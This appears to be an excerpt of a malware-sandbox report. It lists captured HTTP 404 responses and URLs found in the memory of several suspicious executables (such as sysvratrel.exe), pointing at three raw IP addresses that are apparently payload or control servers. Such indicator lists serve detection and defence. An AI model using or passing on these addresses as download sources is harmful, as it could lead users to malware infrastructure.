                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:10:19 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:10:22 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:10:25 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:10:27 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:10:30 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: 135143440.exe, 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, sysvratrel.exe, 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 1682018248.exe, 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 1682018248.exe, 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysvratrel.exe, 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 135143440.exe.0.dr, sysvratrel.exe0.3.dr, 1682018248.exe.3.dr, sysvratrel.exe.3.dr, newtpp[1].exe.0.drString found in binary or memory: http://185.215.113.66/
                                Source: 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1D
                                Source: 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1~
                                Source: 135143440.exe, 00000003.00000002.4535794136.0000000000711000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2
                                Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3
                                Source: 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/383(
                                Source: 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/4
                                Source: 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/5
                                Source: 135143440.exe, 00000003.00000002.4535794136.0000000000711000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/6
                                Source: 135143440.exe, 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, sysvratrel.exe, 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 1682018248.exe, 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 1682018248.exe, 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysvratrel.exe, 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 135143440.exe.0.dr, sysvratrel.exe0.3.dr, 1682018248.exe.3.dr, sysvratrel.exe.3.dr, newtpp[1].exe.0.drString found in binary or memory: http://185.215.113.66/http://91.202.233.141/http://193.233.132.177/123456%s%s%s:Zone.Identifier%user
                                Source: 135143440.exe, 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, sysvratrel.exe, 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 1682018248.exe, 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 1682018248.exe, 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysvratrel.exe, 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 135143440.exe.0.dr, sysvratrel.exe0.3.dr, 1682018248.exe.3.dr, sysvratrel.exe.3.dr, newtpp[1].exe.0.drString found in binary or memory: http://193.233.132.177/
                                Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/1
                                Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/1Z
                                Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/2
                                Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/3
                                Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/3B
                                Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/4
                                Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/5
                                Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/5R
                                Source: 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/5h.dll
                                Source: 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/5h.dllm
                                Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/5z
                                Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/6
                                Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.177/6b
                                Source: 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.20
                                Source: 135143440.exe, 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, sysvratrel.exe, 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 1682018248.exe, 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 1682018248.exe, 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysvratrel.exe, 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 135143440.exe.0.dr, sysvratrel.exe0.3.dr, 1682018248.exe.3.dr, sysvratrel.exe.3.dr, newtpp[1].exe.0.drString found in binary or memory: http://91.202.233.141/
                                Source: 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1
                                Source: 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1p3
                                Source: 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2
                                Source: 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2W3C
                                Source: 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2s
                                Source: 135143440.exe, 00000003.00000002.4535794136.0000000000711000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/3
                                Source: 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/3rosoft
                                Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/4
                                Source: 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/4%
                                Source: 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/40
                                Source: 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/4l3
                                Source: 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/4z
                                Source: 135143440.exe, 00000003.00000002.4536101356.00000000024AB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/5
                                Source: 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/5O
                                Source: 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/6
                                Source: 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/6-3
                                Source: 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/6L2
                                Source: 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/6ZF
                                Source: newtpp[1].exe.0.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                Source: newtpp[1].exe.0.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
